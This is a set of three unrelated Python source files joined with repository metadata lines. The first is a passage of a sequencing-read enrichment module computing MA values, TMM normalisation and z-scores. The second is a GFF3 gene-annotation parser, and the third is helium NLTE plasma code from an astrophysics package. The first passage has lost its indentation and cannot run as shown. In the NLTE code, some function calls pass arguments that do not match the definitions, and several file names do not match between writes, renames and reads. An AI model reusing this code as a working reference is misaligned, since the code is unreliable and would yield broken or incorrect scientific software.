total_reads_background_2 = self.total_reads_replica
signal_background_1 = signal_a
signal_background_2 = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount,
replica_factor, self.total_reads_replica, replica_tags)
else:
numreads_background_1 = 0
numreads_background_2 = 0
for i in range(0, tags_a+tags_b):
if random.uniform(0,2) > 1:
numreads_background_1 += 1
else:
numreads_background_2 += 1
total_reads_background_1 = total_reads_background_2 = self.average_total_reads
signal_background_1 = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount,
replica_factor, self.average_total_reads, numreads_background_1)
signal_background_2 = region_of_interest.normalized_counts(self.len_norm, self.n_norm, self.total_regions, self.pseudocount,
replica_factor, self.average_total_reads, numreads_background_2)
                    #if there is no data in the replica or in the swap and we are not using pseudocounts, don't write the data
if signal_a > 0 and signal_b > 0 and signal_background_1 > 0 and signal_background_2 > 0 or self.use_MA:
if self.use_MA and not self.already_norm:
A = float(sline[10])
M = float(sline[11])
A_prime = float(sline[16])
M_prime = float(sline[17])
else:
if not self.already_norm: #TODO refractor
if self.len_norm: #read per kilobase in region
signal_a = 1e3*(float(signal_a)/len(region_of_interest))
signal_b = 1e3*(float(signal_b)/len(region_of_interest))
signal_background_1 = 1e3*(float(signal_background_1)/len(region_of_interest))
signal_background_2 = 1e3*(float(signal_background_2)/len(region_of_interest))
if self.n_norm: #per million reads in the sample
signal_a = 1e6*(float(signal_a)/self.total_reads_a)
signal_b = 1e6*(float(signal_b)/self.total_reads_b)
if self.use_replica:
signal_background_1 = signal_a
signal_background_2 = 1e6*(float(signal_background_2)/self.total_reads_replica)
else:
signal_background_1 = 1e6*(float(signal_background_1)/self.average_total_reads)
signal_background_2 = 1e6*(float(signal_background_2)/self.average_total_reads)
A = __calc_A(signal_a, signal_b)
M = __calc_M(signal_a, signal_b)
A_prime = __calc_A(signal_background_1, signal_background_2)
M_prime = __calc_M(signal_background_1, signal_background_2)
if CHECK_REPLICAS in self.operations:
self.experiment_values.append(signal_background_1)
self.replica_values.append(signal_background_2)
if NOWRITE not in self.operations:
out_file.write("%s\n"%("\t".join([region_of_interest.write().rstrip("\n"), str(signal_a), str(signal_b), str(signal_background_1), str(signal_background_2), str(A), str(M), str(self.total_reads_a), str(self.total_reads_b), str(tags_a), str(tags_b), str(A_prime), str(M_prime), str(total_reads_background_1), str(total_reads_background_2), str(numreads_background_1), str(numreads_background_2)])))
self.regions_analyzed_count += 1
self.logger.debug("LEAVING _calculate_MA")
if NOWRITE in self.operations:
return ""
else:
out_file.flush()
out_file.close()
# Outputting to HTML (if specified)
if self.html_output is not None:
self.logger.info("Generating HTML")
try:
from jinja2 import Environment, PackageLoader, Markup
except:
self.logger.error("Could not find the jinja2 library")
return out_file.name
loadr = PackageLoader('pyicoteolib', 'templates')
env = Environment(loader=loadr)
template = env.get_template('enrich_html.html')
def jinja_read_file(filename):
f = open(filename, 'r')
#for line in f:
# print line
txt = ''.join(f.readlines())
f.close()
return txt
env.globals['jinja_read_file'] = jinja_read_file
if self.galaxy_workarounds: # Galaxy changes the working directory when outputting multiple files
parent_dir = "./"
else:
parent_dir = os.sep.join(out_file.name.split(os.sep)[0:-1]) + "/"
plot_path = parent_dir + "enrichment_MA_" + out_file.name.split(os.sep)[-1] + ".png"
bed_path = parent_dir + out_file.name.split(os.sep)[-1]
html_file = open(self.html_output, 'w')
html_file.write(template.render({'page_title': 'Enrichment results', 'results_output': jinja_read_file(out_file.name), 'plot_path': plot_path, 'bed_path': bed_path}))
html_file.flush()
html_file.close()
return out_file.name
def _calculate_total_lengths(self):
msg = "Calculating enrichment in regions"
if self.counts_file:
self.sorted_region_path = self.counts_file
if (not self.total_reads_a or not self.total_reads_b or (not self.total_reads_replica and self.use_replica)) and not self.use_MA:
self.logger.info("... counting from counts file...")
self.total_reads_a = 0
self.total_reads_b = 0
if self.total_reads_replica:
self.total_reads_replica = 0
else:
self.total_reads_replica = 1
for line in open(self.counts_file):
try:
enrich = dict(zip(enrichment_keys, line.split()))
self.total_reads_a += float(enrich["signal_a"])
self.total_reads_b += float(enrich["signal_b"])
if self.use_replica:
self.total_reads_replica += float(enrich["signal_prime_2"])
except ValueError:
self.logger.debug("(Counting) skip header...")
else:
self.logger.info("... counting number of lines in files...")
if not self.total_reads_a:
if self.experiment_format == BAM:
self.total_reads_a = bam.size(self.current_experiment_path)
else:
self.total_reads_a = sum(1 for line in utils.open_file(self.current_experiment_path, self.experiment_format, logger=self.logger))
if not self.total_reads_b:
if self.experiment_format == BAM:
self.total_reads_b = bam.size(self.current_control_path)
else:
self.total_reads_b = sum(1 for line in utils.open_file(self.current_control_path, self.control_format, logger=self.logger))
if self.use_replica and not self.total_reads_replica:
if self.experiment_format == BAM:
self.total_reads_replica = bam.size(self.replica_path)
else:
self.total_reads_replica = sum(1 for line in utils.open_file(self.replica_path, self.experiment_format, logger=self.logger))
self.logger.debug("Number lines in experiment A: %s Experiment B: %s"%(self.total_reads_a, self.total_reads_b))
if self.use_replica:
msg = "%s using replicas..."%msg
else:
msg = "%s using swap..."%msg
self.logger.info(msg)
self.average_total_reads = (self.total_reads_a+self.total_reads_b)/2
def enrichment(self):
file_a_reader = file_b_reader = replica_reader = None
self.use_replica = (bool(self.replica_path) or (bool(self.counts_file) and self.use_replica_flag))
self.logger.debug("Use replica: %s"%self.use_replica)
if not USE_MA in self.operations:
_calculate_total_lengths(self)
if not self.counts_file:
file_a_reader = utils.read_fetcher(self.current_experiment_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential, only_counts=True)
file_b_reader = utils.read_fetcher(self.current_control_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential, only_counts=True)
if self.use_replica:
replica_reader = utils.read_fetcher(self.current_replica_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential, only_counts=True)
if self.sorted_region_path:
self.logger.info('Using region file %s (%s)'%(self.region_path, self.region_format))
else:
calculate_region(self) #create region file semi automatically
self.total_regions = sum(1 for line in open(self.sorted_region_path))
self.logger.info("... analyzing regions, calculating normalized counts, A / M and replica or swap...")
self.already_norm = False
if self.use_MA:
ma_path = self.counts_file
else:
ma_path = self.sorted_region_path
out_path = _calculate_MA(self, ma_path, bool(self.counts_file), 1, 1, file_a_reader, file_b_reader, replica_reader)
self.already_norm = True
self.logger.debug("Already normalized: %s"%self.already_norm)
if self.tmm_norm:
if CHECK_REPLICAS in self.operations:
self.experiment_values = []
self.replica_values = []
self.logger.info("TMM Normalizing...")
tmm_factor = calc_tmm_factor(self, out_path, self.regions_analyzed_count, False)
replica_tmm_factor = 1
if self.use_replica:
replica_tmm_factor = calc_tmm_factor(self, out_path, self.regions_analyzed_count, True)
#move output file to old output
#use as input
old_output = '%s/notnormalized_%s'%(self._current_directory(), os.path.basename(self.current_output_path))
move(os.path.abspath(self.current_output_path), old_output)
out_path = _calculate_MA(self, old_output, True, tmm_factor, replica_tmm_factor, True) #recalculate with the new factor, using the counts again
if self.quant_norm:
self.logger.info("Full quantile normalization...")
signal_a = []
signal_prime_1 = []
enrich = []
for line in open(out_path):
sline = line.split()
enrich_line = dict(zip(enrichment_keys, sline))
enrich.append(enrich_line)
signal_a.append(float(enrich_line['signal_a']))
signal_prime_1.append(float(enrich_line['signal_prime_1']))
#full quantile normalization
signal_a.sort()
enrich.sort(key=lambda x:float(x['signal_b']))
quant_counts = open('%s/quantcounts_%s'%(self._current_directory(), os.path.basename(self.current_output_path)), 'w')
for i in range(len(enrich)):
enrich[i]['signal_b'] = signal_a[i]
self.logger.info("Full quantile normalization replica...")
#full quantile normalization of the replica
signal_prime_1.sort()
enrich.sort(key=lambda x:float(x['signal_prime_2']))
for i in range(len(enrich)):
enrich[i]['signal_prime_2'] = signal_prime_1[i]
quant_counts.write("%s\n"%"\t".join(str(enrich[i][key]) for key in enrichment_keys[:20])) #write the lines
quant_counts.flush()
out_path = _calculate_MA(self, quant_counts.name, True, 1, 1, True) #recalculate with the new factor, using the counts again
self._manage_temp_file(quant_counts.name)
self.logger.info("%s regions analyzed."%self.regions_analyzed_count)
if not NOWRITE in self.operations:
self.logger.info("Enrichment result saved to %s"%self.current_output_path)
if CHECK_REPLICAS in self.operations:
check_replica(self)
return out_path
def _sub_tmm(counts_a, counts_b, reads_a, reads_b):
return (counts_a-reads_a)/(counts_a*reads_a) + (counts_b-reads_b)/(counts_b*reads_b)
def calc_tmm_factor(self, file_counts, total_regions, replica):
if replica:
signal_1 = "signal_prime_1"
signal_2 = "signal_prime_2"
M = "M_prime"
reads_2 = self.total_reads_replica
else:
signal_1 = "signal_a"
signal_2 = "signal_b"
M = "M"
reads_2 = self.total_reads_b
values_list = []
#read the file inside the values_list
for line in open(file_counts):
sline = line.split()
values_list.append(dict(zip(enrichment_keys, sline)))
a_trim_number = int(round(total_regions*self.a_trim))
#discard the bad A
self.logger.debug("Removing the worst A (%s regions, %s percent)"%(a_trim_number, self.a_trim*100))
values_list.sort(key=lambda x:float(x["A"])) #sort by A
for i in range (0, a_trim_number):
values_list.pop(0)
values_list.sort(key=lambda x:float(x[M])) #sort by M
m_trim_number = int(round(total_regions*(self.m_trim/2))) #this number is half the value of the flag, because we will trim half below, and half over
#remove on the left
for i in range(0, m_trim_number):
values_list.pop(0)
#remove on the right
for i in range(0, m_trim_number):
values_list.pop(-1)
#now calculate the normalization factor
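    # 'arriba'/'abajo' (Spanish for up/down) hold the numerator and denominator
    # of the weighted mean of M values from which the TMM factor is derived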
arriba = 0
abajo = 0
for value in values_list:
w = _sub_tmm(float(value[signal_1]), float(value[signal_2]), self.total_reads_a, reads_2)
arriba += w*float(value[M])
abajo += w
try:
factor = 2**(arriba/abajo)
except ZeroDivisionError:
self.logger.warning("Division by zero, TMM factor could not be calculated.")
factor = 1
if replica:
self.logger.info("Replica TMM Normalization Factor: %s"%factor)
else:
self.logger.info("TMM Normalization Factor: %s"%factor)
return factor
def __load_enrichment_result(values_path):
ret = []
for line in open(values_path):
sline = line.split()
try:
float(sline[1])
ret.append(dict(zip(enrichment_keys, sline)))
except ValueError:
pass
return ret
def calculate_zscore(self, values_path):
num_regions = sum(1 for line in open(values_path))
bin_size = int(self.binsize*num_regions)
if bin_size < 50:
self.logger.warning("The bin size results in a sliding window smaller than 50, adjusting window to 50 in order to get statistically meaningful results.")
bin_size = 50
bin_step = max(1, int(round(self.bin_step*bin_size)))
self.logger.info("Enrichment window calculation using a sliding window size of %s, sliding with a step of %s"%(bin_size, bin_step))
self.logger.info("... calculating zscore...")
enrichment_result = __load_enrichment_result(values_path)
enrichment_result.sort(key= lambda x:(float(x["A_prime"])))
self.logger.debug("Number of loaded counts: %s"%len(enrichment_result))
self.points = []
#get the standard deviations
for i in range(0, num_regions-bin_size+bin_step, bin_step):
#get the slice
if i+bin_size < num_regions:
result_chunk = enrichment_result[i:i+bin_size]
else:
result_chunk = enrichment_result[i:] #last chunk
#retrieve the values
mean_acum = 0
a_acum = 0
Ms_replica = []
for entry in result_chunk:
mean_acum += float(entry["M_prime"])
a_acum += float(entry["A_prime"])
Ms_replica.append(float(entry["M_prime"]))
#add them to the points of mean and sd
mean = mean_acum/len(result_chunk)
sd = math.sqrt((sum((x - mean)**2 for x in Ms_replica))/len(Ms_replica))
#the A median
A_median = a_acum / len(result_chunk)
self.points.append([A_median, mean, sd]) #The A asigned to the window, the mean and the standard deviation
#self.logger.debug("Window of %s length, with A median: %s mean: %s sd: %s"%(len(result_chunk), self.points[-1][0], self.points[-1][1], self.points[-1][2], len(self.points)))
#update z scores
for entry in enrichment_result:
entry["A_median"] = 0
entry["mean"] = 0
entry["sd"] = 0
entry["zscore"] = 0
closest_A = sys.maxint
sd_position = 0
for i in range(0, len(self.points)):
new_A = self.points[i][0]
if new_A != closest_A: #skip repeated points
if abs(closest_A - float(entry["A"])) >= abs(new_A - float(entry["A"])):
closest_A = new_A
sd_position = i
else:
break #already found, no need to go further since the points are ordered
entry["A_median"] = closest_A
if self.points: #only calculate if there where windows...
__sub_zscore(self.sdfold, entry, self.points[sd_position])
if not self.points: # ... otherwise give a warning
self.logger.warning("Insufficient number of regions analyzed (%s), z-score values could not be calculated"%num_regions)
enrichment_result.sort(key=lambda x:(x["name"], int(x["start"]), int(x["end"])))
old_file_path = '%s/before_zscore_%s'%(self._current_directory(), os.path.basename(values_path)) #create path for the outdated file
move(os.path.abspath(values_path), old_file_path) #move the file
new_file = file(values_path, 'w') #open a new file in the now empty file space
if not self.skip_header:
new_file.write('\t'.join(enrichment_keys))
new_file.write('\n')
for entry in enrichment_result:
new_file.write("\t".join(str(entry[key]) for key in enrichment_keys)+"\n")
self._manage_temp_file(old_file_path)
return values_path
def __sub_zscore(sdfold, entry, point):
entry["mean"] = str(point[1])
entry["sd"] = str(point[2])
entry["zscore"] = str(get_zscore(float(entry["M"]), float(entry["mean"]), sdfold*float(entry["sd"])))
def check_replica(self):
#discard everything below the flag
new_experiment = []
new_replica = []
min_value = sys.maxint
max_value = -sys.maxint
for i in range(len(self.replica_values)):
if self.experiment_values[i] > self.count_filter and self.replica_values[i] > self.count_filter:
new_experiment.append(math.log(self.experiment_values[i], 2))
new_replica.append(math.log(self.replica_values[i], 2))
min_value = min(min_value, math.log(self.experiment_values[i], 2), math.log(self.replica_values[i], 2))
max_value = max(max_value, math.log(self.experiment_values[i], 2), math.log(self.replica_values[i], 2))
#print self.replica_values
self.experiment_values = new_experiment
self.replica_values = new_replica
try:
if self.postscript:
import matplotlib
matplotlib.use("PS")
from matplotlib.pyplot import plot, show, xlabel, ylabel, axhline, axis, clf, text, title, xlim, ylim
except:
__matplotlibwarn(self)
return 0
clf()
r_squared = utils.pearson(self.experiment_values, self.replica_values)**2
text(min_value+abs(max_value)*0.1, max_value-abs(max_value)*0.2, r'Pearson $R^2$= %s'%round(r_squared, 3), fontsize=18, bbox={'facecolor':'yellow', 'alpha':0.5, 'pad':10})
xlabel("log2(%s)"%self.experiment_label, fontsize=18)
ylabel("log2(%s)"%self.replica_label, fontsize=18)
xlim(min_value, max_value)
ylim(min_value, max_value)
title(self.title_label, fontsize=24)
plot(self.experiment_values, self.replica_values, '.')
self._save_figure("check_replica")
def check_replica_correlation(self):
    "Not used, for the moment."
min_tags = 20
experiment_reader = utils.read_fetcher(self.current_experiment_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential)
replica_reader = utils.read_fetcher(self.current_replica_path, self.experiment_format, cached=self.cached, logger=self.logger, use_samtools=self.use_samtools, access_sequential=self.access_sequential)
correlations_acum = 0
num_correlations = 0
for region_line in open(self.region_path):
sline = region_line.split()
region_experiment = self._region_from_sline(sline)
region_replica = region_experiment.copy()
tags_experiment = experiment_reader.get_overlaping_clusters(region_experiment, overlap=1)
tags_replica = replica_reader.get_overlaping_clusters(region_experiment, overlap=1)
count_experiment = len(tags_experiment)
count_replica = len(tags_replica)
correlations = []
if count_experiment+count_replica > min_tags:
region_experiment.add_tags(tags_experiment, clusterize=True)
region_replica.add_tags(tags_replica, clusterize=True)
num_correlations += 1
correlation = utils.pearson(region_experiment.get_array(), region_replica.get_array())
correlations_acum += max(0, correlation)
correlations.append(correlation)
print correlations_acum/num_correlations
try:
if self.postscript:
import matplotlib
matplotlib.use("PS")
from matplotlib.pyplot import plot, boxplot, show, legend, figure, xlabel, ylabel, subplot, axhline, axis
except:
__matplotlibwarn(self)
return 0
print correlations
boxplot(correlations)
self._save_figure("check_replica") | gpl-3.0 | 5,883,346,573,406,230,000 | 46.64218 | 418 | 0.583999 | false |
lyijin/working_with_dna_meth | parse_gff3.py | 1 | 8333 | #!/usr/bin/env python3
"""
> parse_gff3.py <
This script provides helper functions that can be called by other
scripts to handle GFF3 annotations.
parse_gff3() requires a _file object_ (not a filename).
The output is a nested structure of Gene and mRNA objects:
dict[seqid][gene_id] = Gene
    Gene.coords = (start_coord, end_coord)
    Gene.mRNAs[mRNA_id] = mRNA
        mRNA.coords = (start_coord, end_coord)
        mRNA.details[feature] = [(start_coord1, end_coord1), ...]
        where feature is 'exon', 'CDS', 'five_prime_UTR', etc.
"""
# from http://genome.ucsc.edu/FAQ/FAQformat.html#format3:
# Here is a brief description of the GFF fields:
# seqid - The name of the sequence. Must be a chromosome or scaffold.
# source - The program that generated this feature.
# feature - The name of this type of feature. Some examples of standard
# feature types are "CDS", "start_codon", "stop_codon", and "exon".
# start - The starting position of the feature in the sequence. The first base
# is numbered 1.
# end - The ending position of the feature (inclusive).
# score - A score between 0 and 1000. If the track line useScore attribute is
# set to 1 for this annotation data set, the score value will
# determine the level of gray in which this feature is displayed
# (higher numbers = darker gray). If there is no score value, enter ".".
# strand - Valid entries include '+', '-', or '.' (for don't know/don't care).
# frame - If the feature is a coding exon, frame should be a number between
# 0-2 that represents the reading frame of the first base. If the
# feature is not a coding exon, the value should be '.'.
# group - All lines with the same group are linked together into a single item.
# sample line:
# RNA-1;1.gff:1000131 maker five_prime_UTR 1968 1999 .
# + . ID=maker-1000131-exonerate...
# IMPORTANT NOTE ABOUT startpos AND endpos: the biological definition of
# position (1-based) is BAD at dealing with the edge case of startpos == endpos.
# If startpos == endpos, then there's no way to tell whether it's on the
# '+' strand or the '-' strand.
# Thus, startpos and endpos produced by the parse_gff3 def follows the Python
# convention (starting base is sequence[0:1]), which allows for the
# discrimination of '+' and '-' strands.
# e.g. if startpos = 2 and endpos = 3: '+' strand } both refer to
# if endpos = 2 and startpos = 3: '-' strand } the same base
import csv
import re
class Gene:
def __init__(self, coords):
self.coords = coords
self.mRNAs = {}
def __len__(self):
return abs(self.coords[1] - self.coords[0])
def add_mRNA(self, mRNA_id, coords):
"""'mRNA' is a class!"""
self.mRNAs[mRNA_id] = mRNA(coords)
class mRNA:
def __init__(self, coords):
self.coords = coords
self.details = {}
def __len__(self):
return abs(self.coords[1] - self.coords[0])
def add_feature(self, feature_id, coords):
"""coords is a tuple!"""
if feature_id not in self.details:
self.details[feature_id] = []
self.details[feature_id].append(coords)
def natural_sort(input_list):
tryint = lambda x: int(x) if x.isdigit() else x
chunked_text = lambda x: [tryint(y) for y in re.split('([0-9]+)', x)]
sorted_list = sorted(input_list, key=chunked_text)
return sorted_list
def calc_total_exonic_length(list_of_exon_coords):
"""
Given a bunch of exonic coordinates, calculates the total length.
"""
return sum([max(x) - min(x) for x in list_of_exon_coords])
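# Quick illustration (not from the original script):
#   calc_total_exonic_length([(0, 100), (250, 400)]) == 100 + 150 == 250
# max(x) - min(x) is used so the coordinate order within each exon tuple
# (which encodes strand) does not matter.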
def get_attribute(gff3_row, attribute):
attr_search = re.search('{}=(.*?)(;|$)'.format(attribute), gff3_row[8])
if attr_search:
return attr_search.group(1)
else:
raise AttributeError("'{}' does not contain '{}='.".format(
'\t'.join(gff3_row), attribute))
def get_coords(gff3_row):
"""
Returned coordinates are in the tuple (startpos, endpos).
startpos/endpos are 0-based, not 1-based.
"""
strand = gff3_row[6]
if strand == '+':
startpos = int(gff3_row[3]) - 1
endpos = int(gff3_row[4])
elif strand == '-':
startpos = int(gff3_row[4])
endpos = int(gff3_row[3]) - 1
else:
print ('Error: "{}" has no valid strand information.'\
.format('\t'.join(gff3_row)))
raise SystemExit()
return (startpos, endpos)
def pick_longest_mRNA(gff_details):
"""
Given mRNAs contained in Genes, retain only the longest mRNA per gene.
The longest mRNA is the mRNA containing the longest total exonic length,
not raw mRNA length.
"""
for s in gff_details:
for g in gff_details[s]:
# for the sort, keys are sorted by longest exonic length in reverse.
# in case of ties, the longest mRNA (by length) is picked.
sorted_mRNA = sorted(gff_details[s][g].mRNAs,
key=lambda x: (-calc_total_exonic_length(
gff_details[s][g].mRNAs[x].details['exon']),
-len(gff_details[s][g].mRNAs[x])))
# eliminate all other keys except for the longest mRNA.
gff_details[s][g].mRNAs = {sorted_mRNA[0]:
gff_details[s][g].mRNAs[sorted_mRNA[0]]}
return gff_details
def sort_features(gff_details):
"""
Makes sure that feature coordinates are sorted in the right order
(i.e. ascending order for genes in the 5'-3' order; descending for
genes that are in the 3'-5' order).
"""
for s in gff_details:
for g in gff_details[s]:
for m in gff_details[s][g].mRNAs:
for f in gff_details[s][g].mRNAs[m].details:
# gff_details[s][g].mRNAs[m].details[f] has data in the
# form of coordinates, e.g. [(23559, 22882), (22781, 22387)]
coords = gff_details[s][g].mRNAs[m].details[f]
if len(coords) == 1: continue
desc_order = coords[0][0] > coords[0][1]
gff_details[s][g].mRNAs[m].details[f] = \
sorted(coords, reverse=desc_order)
return gff_details
def parse_gff3(gff_file, select_feature='all'):
"""
'gff_file' refers to file object containing gff file.
'select_feature' can be used to select for one or more features of interest
in the gff file (e.g. "three_prime_UTR", ['three_prime_UTR', 'five_prime_UTR'])
NOTE: all variables are named according to convention!
"""
gff_details = {}
tsv_reader = csv.reader(gff_file, delimiter='\t')
for row in tsv_reader:
# ignore blank lines and comments (lines starting with '#')
if not row: continue
if row[0].startswith('#'): continue
feature = row[2]
# ignore lines that do not correspond to the feature wanted (with the
# exception of gene and mRNA, we always want that information).
if select_feature == 'all' or feature in ['gene', 'mRNA'] \
or feature in select_feature:
seqid = row[0]
if seqid not in gff_details:
gff_details[seqid] = {}
coords = get_coords(row)
if feature == 'gene':
gene_id = get_attribute(row, 'ID')
gff_details[seqid][gene_id] = Gene(coords)
elif feature == 'mRNA':
mRNA_id = get_attribute(row, 'ID')
gff_details[seqid][gene_id].add_mRNA(mRNA_id, coords)
else:
# mRNA_ids might be multiple IDs, separated with commas.
mRNA_ids = get_attribute(row, 'Parent')
for m in mRNA_ids.split(','):
gff_details[seqid][gene_id].mRNAs[m].add_feature(feature, coords)
return gff_details
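# Example traversal (a sketch only; 'annots.gff3' is a placeholder filename):
#   gff = parse_gff3(open('annots.gff3'), select_feature='exon')
#   gff = pick_longest_mRNA(gff)
#   gff = sort_features(gff)
#   for seqid in gff:
#       for gene_id, gene in gff[seqid].items():
#           for mrna_id, mrna in gene.mRNAs.items():
#               total_exonic_len = calc_total_exonic_length(mrna.details['exon'])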
# debug
# if __name__ == '__main__':
# temp = parse_gff3(open('test.gff3'), select_feature='exon')
# print (temp['ctg123']['gene00001'].mRNAs)
# print (pick_longest_mRNA(temp)['ctg123']['gene00001'].mRNAs)
| gpl-3.0 | 4,050,465,350,289,512,000 | 37.762791 | 85 | 0.572663 | false |
tardis-sn/tardis | tardis/plasma/properties/nlte.py | 1 | 10502 | import logging
import os
import numpy as np
import pandas as pd
from tardis.plasma.properties.base import (
PreviousIterationProperty,
ProcessingPlasmaProperty,
)
from tardis.plasma.properties.ion_population import PhiSahaNebular
__all__ = [
"PreviousElectronDensities",
"PreviousBetaSobolev",
"HeliumNLTE",
"HeliumNumericalNLTE",
]
logger = logging.getLogger(__name__)
class PreviousElectronDensities(PreviousIterationProperty):
"""
Attributes
----------
previous_electron_densities : The values for the electron densities converged upon in the previous iteration.
"""
outputs = ("previous_electron_densities",)
def set_initial_value(self, kwargs):
initial_value = pd.Series(
1000000.0,
index=kwargs["abundance"].columns,
)
self._set_initial_value(initial_value)
class PreviousBetaSobolev(PreviousIterationProperty):
"""
Attributes
----------
previous_beta_sobolev : The beta sobolev values converged upon in the previous iteration.
"""
outputs = ("previous_beta_sobolev",)
def set_initial_value(self, kwargs):
initial_value = pd.DataFrame(
1.0,
index=kwargs["atomic_data"].lines.index,
columns=kwargs["abundance"].columns,
)
self._set_initial_value(initial_value)
class HeliumNLTE(ProcessingPlasmaProperty):
outputs = ("helium_population",)
@staticmethod
def calculate(
level_boltzmann_factor,
ionization_data,
beta_rad,
g,
g_electron,
w,
t_rad,
t_electrons,
delta,
zeta_data,
number_density,
partition_function,
):
"""
Updates all of the helium level populations according to the helium NLTE recomb approximation.
"""
helium_population = level_boltzmann_factor.loc[2].copy()
# He I excited states
he_one_population = HeliumNLTE.calculate_helium_one(
g_electron, beta_rad, ionization_data, level_boltzmann_factor, g, w
)
helium_population.loc[0].update(he_one_population)
# He I ground state
helium_population.loc[0, 0] = 0.0
# He II excited states
he_two_population = level_boltzmann_factor.loc[2, 1].mul(
(g.loc[2, 1, 0] ** (-1.0))
)
helium_population.loc[1].update(he_two_population)
# He II ground state
helium_population.loc[1, 0] = 1.0
# He III states
helium_population.loc[2, 0] = HeliumNLTE.calculate_helium_three(
t_rad,
w,
zeta_data,
t_electrons,
delta,
g_electron,
beta_rad,
ionization_data,
g,
)
# unnormalised = helium_population.sum()
# normalised = helium_population.mul(number_density.ix[2] / unnormalised)
# helium_population.update(normalised)
return helium_population
@staticmethod
def calculate_helium_one(
g_electron, beta_rad, ionization_data, level_boltzmann_factor, g, w
):
"""
Calculates the He I level population values, in equilibrium with the He II ground state.
"""
return (
level_boltzmann_factor.loc[2, 0]
* (1.0 / (2 * g.loc[2, 1, 0]))
* (1 / g_electron)
* (1 / (w ** 2.0))
* np.exp(ionization_data.loc[2, 1] * beta_rad)
)
@staticmethod
def calculate_helium_three(
t_rad,
w,
zeta_data,
t_electrons,
delta,
g_electron,
beta_rad,
ionization_data,
g,
):
"""
Calculates the He III level population values.
"""
zeta = PhiSahaNebular.get_zeta_values(zeta_data, 2, t_rad)[1]
he_three_population = (
2
* (float(g.loc[2, 2, 0]) / g.loc[2, 1, 0])
* g_electron
* np.exp(-ionization_data.loc[2, 2] * beta_rad)
* w
* (delta.loc[2, 2] * zeta + w * (1.0 - zeta))
* (t_electrons / t_rad) ** 0.5
)
return he_three_population
class HeliumNumericalNLTE(ProcessingPlasmaProperty):
"""
IMPORTANT: This particular property requires a specific numerical NLTE
solver and a specific atomic dataset (neither of which are distributed
with Tardis) to work.
"""
outputs = ("helium_population",)
def __init__(self, plasma_parent, heating_rate_data_file):
super(HeliumNumericalNLTE, self).__init__(plasma_parent)
self._g_upper = None
self._g_lower = None
self.heating_rate_data = np.loadtxt(heating_rate_data_file, unpack=True)
def calculate(
self,
ion_number_density,
electron_densities,
t_electrons,
w,
lines,
j_blues,
levels,
level_boltzmann_factor,
t_rad,
zeta_data,
g_electron,
delta,
partition_function,
ionization_data,
beta_rad,
g,
time_explosion,
):
logger.info("Performing numerical NLTE He calculations.")
if len(j_blues) == 0:
return None
# Outputting data required by SH module
for zone, _ in enumerate(electron_densities):
with open(
f"He_NLTE_Files/shellconditions_{zone}.txt", "w"
) as output_file:
output_file.write(ion_number_density.loc[2].sum()[zone])
output_file.write(electron_densities[zone])
output_file.write(t_electrons[zone])
output_file.write(self.heating_rate_data[zone])
output_file.write(w[zone])
output_file.write(time_explosion)
output_file.write(t_rad[zone])
output_file.write(self.plasma_parent.v_inner[zone])
output_file.write(self.plasma_parent.v_outer[zone])
for zone, _ in enumerate(electron_densities):
with open(
f"He_NLTE_Files/abundances_{zone}.txt", "w"
) as output_file:
for element in range(1, 31):
try:
number_density = (
ion_number_density[zone].loc[element].sum()
)
except:
number_density = 0.0
output_file.write(number_density)
helium_lines = lines[lines["atomic_number"] == 2]
helium_lines = helium_lines[helium_lines["ion_number"] == 0]
for zone, _ in enumerate(electron_densities):
with open(
f"He_NLTE_Files/discradfield_{zone}.txt", "w"
) as output_file:
j_blues = pd.DataFrame(j_blues, index=lines.index)
helium_j_blues = j_blues[zone].loc[helium_lines.index]
for value in helium_lines.index:
if helium_lines.level_number_lower.loc[value] < 35:
output_file.write(
int(helium_lines.level_number_lower.loc[value] + 1),
int(helium_lines.level_number_upper.loc[value] + 1),
j_blues[zone].loc[value],
)
# Running numerical simulations
for zone, _ in enumerate(electron_densities):
os.rename(
f"He_NLTE_Files/abundances{zone}.txt",
"He_NLTE_Files/abundances_current.txt",
)
os.rename(
f"He_NLTE_Files/shellconditions{zone}.txt",
"He_NLTE_Files/shellconditions_current.txt",
)
os.rename(
f"He_NLTE_Files/discradfield{zone}.txt",
"He_NLTE_Files/discradfield_current.txt",
)
os.system("nlte-solver-module/bin/nlte_solvertest >/dev/null")
os.rename(
"He_NLTE_Files/abundances_current.txt",
f"He_NLTE_Files/abundances{zone}.txt",
)
os.rename(
"He_NLTE_Files/shellconditions_current.txt",
f"He_NLTE_Files/shellconditions{zone}.txt",
)
os.rename(
"He_NLTE_Files/discradfield_current.txt",
f"He_NLTE_Files/discradfield{zone}.txt",
)
os.rename("debug_occs.dat", f"He_NLTE_Files/occs{zone}.txt")
# Reading in populations from files
helium_population = level_boltzmann_factor.loc[2].copy()
for zone, _ in enumerate(electron_densities):
with open(
f"He_NLTE_Files/discradfield{zone}.txt", "r"
) as read_file:
for level in range(0, 35):
level_population = read_file.readline()
level_population = float(level_population)
helium_population[zone].loc[0, level] = level_population
helium_population[zone].loc[1, 0] = float(read_file.readline())
# Performing He LTE level populations (upper two energy levels,
# He II excited states, He III)
he_one_population = HeliumNLTE.calculate_helium_one(
g_electron,
beta_rad,
partition_function,
ionization_data,
level_boltzmann_factor,
electron_densities,
g,
w,
t_rad,
t_electrons,
)
helium_population.loc[0, 35].update(he_one_population.loc[35])
helium_population.loc[0, 36].update(he_one_population.loc[36])
he_two_population = level_boltzmann_factor.loc[2, 1, 1:].mul(
            (g.loc[2, 1, 0] ** (-1)) * helium_population.loc[1, 0]  # He II ground state
)
helium_population.loc[1, 1:].update(he_two_population)
helium_population.loc[2, 0] = HeliumNLTE.calculate_helium_three(
t_rad,
w,
zeta_data,
t_electrons,
delta,
g_electron,
beta_rad,
partition_function,
ionization_data,
electron_densities,
)
unnormalised = helium_population.sum()
normalised = helium_population.mul(
ion_number_density.loc[2].sum() / unnormalised
)
helium_population.update(normalised)
return helium_population
| bsd-3-clause | -4,974,188,119,503,110,000 | 32.552716 | 113 | 0.541516 | false |
